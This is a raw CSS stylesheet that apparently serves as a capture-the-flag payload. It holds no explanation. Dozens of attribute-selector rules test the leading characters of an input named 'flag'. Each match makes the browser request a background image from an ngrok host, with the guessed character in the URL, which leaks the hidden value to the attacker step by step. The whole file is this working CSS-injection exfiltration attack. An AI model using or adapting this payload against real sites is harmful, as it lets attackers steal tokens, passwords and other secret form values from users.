input[name=flag][value^="F0"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F0");}
input[name=flag][value^="F1"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F1");}
input[name=flag][value^="F2"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F2");}
input[name=flag][value^="F3"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F3");}
input[name=flag][value^="F4"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F4");}
input[name=flag][value^="F5"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F5");}
input[name=flag][value^="F6"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F6");}
input[name=flag][value^="F7"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F7");}
input[name=flag][value^="F8"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F8");}
input[name=flag][value^="F9"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F9");}
input[name=flag][value^="Fa"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fa");}
input[name=flag][value^="Fb"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fb");}
input[name=flag][value^="Fc"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fc");}
input[name=flag][value^="Fd"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fd");}
input[name=flag][value^="Fe"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fe");}
input[name=flag][value^="Ff"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Ff");}
input[name=flag][value^="Fg"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fg");}
input[name=flag][value^="Fh"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fh");}
input[name=flag][value^="Fi"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fi");}
input[name=flag][value^="Fj"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fj");}
input[name=flag][value^="Fk"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fk");}
input[name=flag][value^="Fl"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fl");}
input[name=flag][value^="Fm"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fm");}
input[name=flag][value^="Fn"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fn");}
input[name=flag][value^="Fo"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fo");}
input[name=flag][value^="Fp"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fp");}
input[name=flag][value^="Fq"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fq");}
input[name=flag][value^="Fr"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fr");}
input[name=flag][value^="Fs"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fs");}
input[name=flag][value^="Ft"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Ft");}
input[name=flag][value^="Fu"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fu");}
input[name=flag][value^="Fv"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fv");}
input[name=flag][value^="Fw"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fw");}
input[name=flag][value^="Fx"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fx");}
input[name=flag][value^="Fy"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fy");}
input[name=flag][value^="Fz"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=Fz");}
input[name=flag][value^="FA"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FA");}
input[name=flag][value^="FB"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FB");}
input[name=flag][value^="FC"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FC");}
input[name=flag][value^="FD"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FD");}
input[name=flag][value^="FE"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FE");}
input[name=flag][value^="FF"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FF");}
input[name=flag][value^="FG"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FG");}
input[name=flag][value^="FH"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FH");}
input[name=flag][value^="FI"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FI");}
input[name=flag][value^="FJ"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FJ");}
input[name=flag][value^="FK"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FK");}
input[name=flag][value^="FL"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FL");}
input[name=flag][value^="FM"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FM");}
input[name=flag][value^="FN"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FN");}
input[name=flag][value^="FO"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FO");}
input[name=flag][value^="FP"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FP");}
input[name=flag][value^="FQ"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FQ");}
input[name=flag][value^="FR"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FR");}
input[name=flag][value^="FS"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FS");}
input[name=flag][value^="FT"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FT");}
input[name=flag][value^="FU"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FU");}
input[name=flag][value^="FV"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FV");}
input[name=flag][value^="FW"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FW");}
input[name=flag][value^="FX"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FX");}
input[name=flag][value^="FY"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FY");}
input[name=flag][value^="FZ"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=FZ");}
input[name=flag][value^="F{"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F{");}
input[name=flag][value^="F_"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F_");}
input[name=flag][value^="F}"] {background-image: url("http://e4d8-118-69-3-232.ngrok.io?flag=F}");}
